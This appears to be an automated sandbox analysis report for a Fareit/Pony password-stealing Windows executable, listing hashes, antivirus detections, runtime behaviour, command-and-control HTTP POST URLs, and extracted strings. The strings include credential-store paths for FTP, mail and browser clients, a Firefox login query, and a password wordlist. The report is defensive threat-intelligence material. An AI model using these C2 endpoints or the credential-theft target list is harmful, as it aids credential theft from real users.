Analysis Date2014-01-14 16:27:05
MD51f951722cfb0faa3fd6bfb16eb162a51
SHA12c351ea19d1d12fd9bfa7e26310f953b4c0ad2b9

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 42ccac9fb196578bd872317b010811fe sha1: dede56e28f509c1922d3c94723e6d16c316923bd size: 70656
Section.rdata md5: 62b50172bb46ac5ad3e41d6230f4b01c sha1: c5cb30dbca14070891c54a09a7dd2abd028a7597 size: 512
Section.data md5: 9ec7533421c8f8132b1967b260897514 sha1: 0e1f332cf9be9eedea7ce9c76a9cc365fb094b1f size: 18944
Timestamp2013-01-20 17:33:27
PEhash27364e21e5b07fd14ed4de01ad97ed7556b12034
AVaviraTR/PSW.Fareit.iloen
AVavgPSW.Generic10.BOHQ
AVmssePWS:Win32/Fareit.gen!I
AVmcafeePWS-Zbot.gen.aiz

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\WinRAR\HWID ➝
NULL
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!

Network Details:

DNSweb187.cyberwebserver-12.de
Type: A
212.72.183.21
DNSsimplyglutenfreemagazine.com
Type: A
97.74.55.128
DNSpatslighting.com
Type: A
198.252.70.200
HTTP POSThttp://web187.cyberwebserver-12.de/default.php?lXrV874cBqLEg74Uf2FGh2fE
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
HTTP POSThttp://web187.cyberwebserver-12.de/default.php?lXrV874cBqLEg74Uf2FGh2fE
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
HTTP POSThttp://web187.cyberwebserver-12.de/default.php?lXrV874cBqLEg74Uf2FGh2fE
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
HTTP POSThttp://simplyglutenfreemagazine.com/default.php?hAXCtgpvNg2Vr5FVRsOQdkh
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
HTTP POSThttp://simplyglutenfreemagazine.com/default.php?hAXCtgpvNg2Vr5FVRsOQdkh
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
HTTP POSThttp://simplyglutenfreemagazine.com/default.php?hAXCtgpvNg2Vr5FVRsOQdkh
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
HTTP POSThttp://patslighting.com/default.php?jWSiuaVrU4bmvNEAct22El18SbOcLG4u1DJ
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
HTTP POSThttp://patslighting.com/default.php?jWSiuaVrU4bmvNEAct22El18SbOcLG4u1DJ
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
HTTP POSThttp://patslighting.com/default.php?jWSiuaVrU4bmvNEAct22El18SbOcLG4u1DJ
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Flows TCP192.168.1.1:1031 ➝ 212.72.183.21:80
Flows TCP192.168.1.1:1032 ➝ 212.72.183.21:80
Flows TCP192.168.1.1:1033 ➝ 212.72.183.21:80
Flows TCP192.168.1.1:1034 ➝ 97.74.55.128:80
Flows TCP192.168.1.1:1035 ➝ 97.74.55.128:80
Flows TCP192.168.1.1:1036 ➝ 97.74.55.128:80
Flows TCP192.168.1.1:1037 ➝ 198.252.70.200:80
Flows TCP192.168.1.1:1038 ➝ 198.252.70.200:80
Flows TCP192.168.1.1:1039 ➝ 198.252.70.200:80

Raw Pcap

Strings
jjjj
jjjjjj
pSettings
000000
{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
111111
11111111
112233
123123
123321
123456
1234567
12345678
123456789
1234567890
123abc
123qwe
1q2w3e
1q2w3e4r
'2, /+0&7!4-)1#
222222
2.5.29.37
\32BitFtp.ini
;3+#>6.&
\3D-FTP
3D-FTP
654321
666666
{74FF1730-B1F2-4D88-926B-1568FAE61DB7}
7777777
9|$4r4
9D$(ub
aaaaaa
abc123
abcd.bat
Accept: */*
Accept-Encoding: identity, *;q=0
account.cfg
account.cfn
\Accounts
accounts.ini
\AceBIT
addrbk.dat
adidas
AdjustTokenPrivileges
Administrative Tools
advapi32.dll
AllocateAndInitializeSid
amanda
andrew
angel1
angels
anthony
aPLib v1.01  -  the smaller the better :)
AppData
AppDir
asdfasdf
asdfgh
ashley
asshole
austin
bailey
banana
bandit
baseball
\BatMail
batman
benjamin
billgates
biteme
\BitKinex
bitkinex.ds
blabla
blahblah
BlazeFtp
\BlazeFtp
blessed
blessing
blink182
bookmark.dat
\Bromium
bubbles
\BulletProof Software
buster
Buttons
canada
cassie
CertCloseStore
CertEnumCertificatesInStore
CertOpenSystemStoreA
charlie
CheckTokenMembership
cheese
chelsea
chicken
christ
\ChromePlus
\Chromium
church
Client Hash
CloseHandle
closesocket
CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32
cocacola
CoCreateGuid
CoCreateInstance
\CoffeeCup Software
Common Administrative Tools
Common AppData
Common Documents
\Comodo
compaq
computer
Config Path
connect
Connection: close
Connections.txt
CONSTRAINT
Content-Encoding: binary
Content-Length:
Content-Length: %lu
Content-Type: application/octet-stream
ConvertSidToStringSidA
cookie
Cookies
Copyright (c) 1998-2009 by Joergen Ibsen, All Rights Reserved.
corvette
CoTaskMemFree
CreateDirectoryA
CreateFileA
CreateFileMappingA
CreateStreamOnHGlobal
CreateToolhelp32Snapshot
creative
CredentialCheck
CredentialSalt
CredEnumerateA
CredFree
crypt32.dll
CryptAcquireCertificatePrivateKey
CryptDestroyKey
CryptExportKey
CryptGetUserKey
CryptReleaseContext
CryptUnprotectData
\CuteFTP
CUTEFTP
\Cyberduck
D$0;D$(
dakota
dallas
daniel
danielle
@.data
DataDir
DataDirBak
DataFolder
DataPath
Default
DEFDIR
 del 	  %0 
 del 	%1  
DeleteFileA
DeluxeFTP
destiny
dexter
diamond
digital
Dir #%d
Directory
DisplayName
+D$P][_^
DPAPI: 
dragon
\drives.js
EasyFTP
EmailAddress
eminem
emmanuel
\Epic\Epic
ESTdb2.dat
\Estsoft\ALFTP
ExitProcess
ExpandEnvironmentStringsA
\ExpanDrive
ExpanDrive_Home
explorer.exe
FastStone Browser
Favorites.dat
\FileZilla
\filezilla.xml
FindClose
FindFirstFileA
FindNextFileA
Firefox
fireFTPsites.dat
\FlashFXP\3
\FlashFXP\4
\Flock\Browser\
flower
Folder
foobar
football
football1
FOREIGN
forever
freedom
FreeSid
FreshFTP
friend
friends
\Frigate3
FSProtocol
ftp://
FTP Commander
FTPCON
FTP CONTROL
FTP Count
FTP destination catalog
FTP destination password
FTP destination port
FTP destination server
FTP destination user
FtpDirectory
\FTP Explorer
FTP File%d
\FTPGetter
\FTPInfo
FtpIniName
ftplast.osd
FTP++.Link\shell\open\command
FTPList.db
ftplist.txt
FTP Navigator
FTPNow
FTP Now
FtpPassword
_FtpPassword
FtpPort
FTP profiles
\FTPRush
FtpServer
FTPShell
ftpshell.fsi
ftpsite.ini
FtpSite.xml
FtpUserName
FTPVoyager.ftp
FTPVoyager.qc
fuckoff
fuckyou
fuckyou1
full address:s:
gateway
genesis
george
GetCurrentDirectoryA
GetCurrentProcess
GetFileAttributesA
GetFileSize
GetHGlobalFromStream
gethostbyname
GetLastError
GetLocaleInfoA
GetModuleFileNameA
GetModuleHandleA
GetNativeSystemInfo
GetPrivateProfileIntA
GetPrivateProfileSectionNamesA
GetPrivateProfileStringA
GetProcAddress
GetSystemInfo
GetTempPathA
GetTickCount
GetTokenInformation
GetUserNameA
GetVersionExA
GetWindowsDirectoryA
gfhjkm
ghbdtn
\GHISLER
ginger
\Global Downloader
GlobalLock
\GlobalSCAPE\CuteFTP
\GlobalSCAPE\CuteFTP Lite
\GlobalSCAPE\CuteFTP Pro
GlobalUnlock
google
\Google\Chrome
\GPSoftware\Directory Opus
guitar
hahaha
hannah
hardcore
harley
heaven
hello1
helpme
History
\History.dat
History.dat
hockey
HostAdrs
HostDirName
Hostname
HostName
Host: %s
hotdog
http://
http://cms.foodbook.pk/default.php?c82fFCEqryrEQ5OctPxuiAQqWFFCNN6Shm5Z
<HTTPMail_Password2
HTTPMail Password2
HTTPMail Server
HTTPMail User Name
HTTP Password
http://patslighting.com/default.php?jWSiuaVrU4bmvNEAct22El18SbOcLG4u1DJ
https://
HTTP Server URL
http://simplyglutenfreemagazine.com/default.php?hAXCtgpvNg2Vr5FVRsOQdkh
HTTP User
http://web187.cyberwebserver-12.de/default.php?lXrV874cBqLEg74Uf2FGh2fE
http://worldwidehat.com/default.php?Duj1JNAoXtCHSG2xVCNy3LYsPh5WoNm2F2t
hunter
identification
identities
Identities
identitymgr
	if 		 exist 	   %1  	  goto 	
	 :ijk 
ilovegod
iloveyou
iloveyou!
iloveyou1
iloveyou2
IMAP Password
<IMAP_Password2
IMAP Password2
IMAP Port
IMAP Server
IMAP User
IMAP User Name
ImpersonateLoggedOnUser
inet_addr
inetcomm server passwords
InitialDirectory
InitialPath
\INSoftware\NovaFTP
InstallDir
Install_Dir
InstallDir1
InstallerDathPath
installpath
InstallPath
Install Path
internet
InternetCrackUrlA
InternetCreateUrlA
Internet Explorer
\Ipswitch
\Ipswitch\WS_FTP
IsRelative
IsTextUnicode
IsWow64Process
jasmine
jasper
jennifer
jessica
jesus1
john316
jordan
jordan23
joseph
joshua
junior
justin
kernel32.dll
killer
kitten
\K-Meleon
K-Meleon
knight
L$(9L$@
LastAddress
Last Directory3
Last Install Path
LastPassword
LastPort
Last Server Host
Last Server Pass
Last Server Path
Last Server Port
Last Server Type
Last Server User
LastSessionFile
LastUser
LCMapStringA
leapftp
\LeapWare\LeapFTP
letmein
LoadLibraryA
LoadUserProfileA
LocalAlloc
Local AppData
LocalDir
LocalFree
Location:
Login Data
logins
LogonUserA
london
looking
LookupPrivilegeValueA
lovely
loving
+L$PRQW
lstrcatA
lstrcmpA
lstrcmpiA
lstrcpyA
lstrlenA
lstrlenW
maggie
Mailbox.ini
\MapleStudio\ChromePlus
MapViewOfFile
master
matrix
matthew
maverick
maxwell
merlin
michael
michelle
mickey
microsoft
\Microsoft\Windows Live Mail
\Microsoft\Windows Mail
Microsoft_WinInet_*
monkey
More information: http://www.ibsensoftware.com/
mother
Mozilla
\Mozilla\Firefox\
\Mozilla\Profiles\
\Mozilla\SeaMonkey\
mozsqlite3.dll
msi.dll
MS IE FTP Passwords
MsiGetComponentPathA
muffin
MultiByteToWideChar
mustang
mustdie
My Documents
My FTP
mylove
My Pictures
myspace1
nathan
NDSites.ini
netapi32.dll
NetApiBufferFree
\NetDrive
\NetSarang
NetUserEnum
NexusFile
\Nichrome
nicole
nintendo
NNTP Email Address
NNTP Password
NNTP Password2
NNTP Server
NNTP User Name
\Notepad++
nothing
NovaFTP.db
NppFTP.xml
nss3.dll
NSSBase64_DecodeBuffer
NSS_Init
NSS_Shutdown
.oeaccount
ole32.dll
OleInitialize
onelove
online
OpenProcess
OpenProcessToken
Opera.HTML\shell\open\command
orange
origin_url
Outlook
outlook account manager passwords
passw0rd
password
"password" : "
Password
_Password
PassWord
password1
password 51:b:
PasswordType
password_value
PathToExe
peaches
peanut
pepper
Personal
PK11_Authenticate
PK11_FreeSlot
PK11_GetInternalKeySlot
PK11SDR_Decrypt
\Pocomail
\PocoSystem.ini
pokemon
POP3 Password
<POP3_Password2
POP3 Password2
POP3 Port
POP3 Server
POP3 User
POP3 User Name
PopAccount
PopPassword
PopPort
PopServer
PortNumber
POST %s HTTP/1.0
PPh=pA
praise
prayer
prefs.js
PRIMARY
prince
princess
Process32First
Process32Next
ProcessIdToSessionId
Profile
\Profiles
profiles.ini
profiles.xml
Program
ProgramDir
project.ini
PSQRWV
pstorec.dll
PStoreCreateInstance
purple
qazwsx
QCHistory
QData.dat
quick.dat
\Quick.dat
qwerty
qwerty1
rachel
rainbow
`.rdata
ReadFile
\recentservers.xml
red123
RegCloseKey
RegCreateKeyA
RegEnumKeyExA
RegEnumValueA
RegOpenCurrentUser
RegOpenKeyA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
RemoteDir
Remote Dir
RemoteDirectory
RevertToSelf
\RhinoSoft.com
richard
robert
\RockMelt
RootDirectory
rotimi
RushSite.xml
    "%s"   
S-1-5-18
samantha
samuel
scooby
scooter
SeaMonkey
SeAssignPrimaryTokenPrivilege
SeBackupPrivilege
SeChangeNotifyPrivilege
SECITEM_FreeItem
SeCreateTokenPrivilege
secret
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
select
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins
SeRestorePrivilege
Server
Server.Host
ServerList.xml
ServerName
Server.Pass
Server.Port
servers.xml
ServerType
Server Type
Server.User
\Sessions
SeTcbPrivilege
SetCurrentDirectoryA
setsockopt
<setting name="
SetUnhandledExceptionFilter
shadow
shalom
\SharedSettings_1_0_5.ccs
\SharedSettings_1_0_5.sqlite
\SharedSettings.ccs
\SharedSettings.sqlite
shell32.dll
ShellExecuteA
SHGetFolderPathA
shlwapi.dll
signons2.txt
signons3.txt
signons.sqlite
signons.txt
silver
single
site.dat
\SiteDesigner
SiteInfo.QFP
\sitemanager.xml
\Sites
Sites\
sites.dat
\Sites.dat
sites.db
SitesDir
SiteServer %d\Host
SiteServer %d\Remote Directory
SiteServer %d\SFTP
SiteServer %d-User
SiteServer %d-User PW
SiteServer %d\WebUrl
SiteServers
sites.ini
\sites.xml
sites.xml
%s\Keychain
slayer
SM.arch
\SmartFTP
\sm.dat
smokey
SmtpAccount
SMTP Email Address
SmtpPassword
SMTP Password
<SMTP_Password2
SMTP Password2
SmtpPort
SMTP Port
SmtpServer
SMTP Server
SMTP User
SMTP User Name
snoopy
soccer
soccer1
socket
Software\AceBIT
Software\Adobe\Common
Software\BPFTP
Software\BPFTP\Bullet Proof FTP\Main
Software\BPFTP\Bullet Proof FTP\Options
Software\BulletProof Software\BulletProof FTP Client\Main
Software\BulletProof Software\BulletProof FTP Client\Options
Software\ChromePlus
SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
Software\CoffeeCup Software
Software\CoffeeCup Software\Internet\Profiles
Software\Cryer\WebSitePublisher
Software\ExpanDrive
Software\ExpanDrive\Sessions
Software\Far2\Plugins\FTP\Hosts
Software\Far2\SavedDialogHistory\FTPHost
Software\Far Manager\Plugins\FTP\Hosts
Software\Far Manager\SavedDialogHistory\FTPHost
Software\Far\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\FileZilla
Software\FileZilla Client
Software\FlashFXP
Software\FlashFXP\3
Software\FlashFXP\4
Software\FlashPeak\BlazeFtp\Settings
Software\FTPClient\Sites
Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
Software\FTP Explorer\Profiles
Software\FTPWare\COREFTP\Sites
Software\Ghisler\Total Commander
Software\Ghisler\Windows Commander
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
Software\IncrediMail
SOFTWARE\LeapWare
Software\LeechFTP
Software\LinasFTP\Site Manager
Software\Martin Prikryl
Software\MAS-Soft\FTPInfo\Setup
Software\Microsoft\Internet Account Manager
Software\Microsoft\Internet Account Manager\Accounts
Software\Microsoft\Internet Explorer\IntelliForms\Storage2
Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Software\Microsoft\Windows Live Mail
Software\Microsoft\Windows Mail
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Software\Mozilla
Software\NCH Software\ClassicFTP\FTPAccounts
SOFTWARE\NCH Software\Fling\Accounts
Software\Nico Mak Computing\WinZip\FTP
Software\Nico Mak Computing\WinZip\mru\jobs
_Software\Opera Software
Software\Poco Systems Inc
Software\RimArts\B2\Settings
Software\RIT\The Bat!
Software\RIT\The Bat!\Users depot
SOFTWARE\Robo-FTP 3.7\FTPServers
SOFTWARE\Robo-FTP 3.7\Scripts
Software\SimonTatham\PuTTY\Sessions
Software\SoftX.org\FTPClient\Sites
Software\Sota\FFFTP
Software\Sota\FFFTP\Options
Software\South River Technologies\WebDrive\Connections
Software\TurboFTP
Software\VanDyke\SecureFX
Software\WinRAR
sparky
spirit
sqlite3_close
sqlite3_column_blob
sqlite3_column_bytes
sqlite3.dll
sqlite3_open
sqlite3_prepare
sqlite3_step
SQLite format 3
Staff-FTP
startrek
starwars
STATUS-IMPORT-OK
stella
StgOpenStorage
StrCmpNIA
StrRChrIA
StrStrA
StrStrIA
StrStrIW
StrToIntA
summer
sunshine
superman
SVWhTPA
SWPXh'
t9h>\A
tahj]A
taylor
tchjTA
Technology
tEhhbA
tEhLjA
tEhUbA
tEhxkA
TerminalType
TERMSRV/
TERMSRV/*
testing
testtest
tFhecA
tFhWIA
tGhkfA
tGhyfA
t$h7gA
\The Bat!
t)h*fA
t)h#fA
t$h/gA
!This program cannot be run in DOS mode.
thomas
t>h@PA
t$hPfA
t;h$RA
t$huaA
thunder
Thunderbird
\Thunderbird
t=hWIA
t-hWIA
t.hWIA
t(hWIA
t$h>YA
t%h,ZA
tigger
tKhnYA
trinity
trustno1
\TurboFTP
UltraFXP
uM9l$D}G
UninstallString
UNIQUE
unleap.exe
UnloadUserProfile
UnmapViewOfFile
user32.dll
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
user.config
userenv.dll
UserID
Username
UserName
username:s:
username_value
v89l$D|0
value="
\VanDyke\Config\Sessions
victory
\Visicom Media
VWPSQR
wand.dat
wcx_ftp.ini
Web Data
welcome
whatever
WideCharToMultiByte
william
windows
winex="
WinFTP
WininetCacheCredentials
wininet.dll
\win.ini
winner
wisdom
wiseftp.ini
wiseftpsrvs.bin
wiseftpsrvs.ini
Wk;dZ3lLHxJ
Working Directory
WriteFile
WSAStartup
WS_FTP
wsock32.dll
wsprintfA
WTSGetActiveConsoleSessionId
xflags
\Yandex
YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0
zxcvbnm
^_ZY[X
ZY[X_^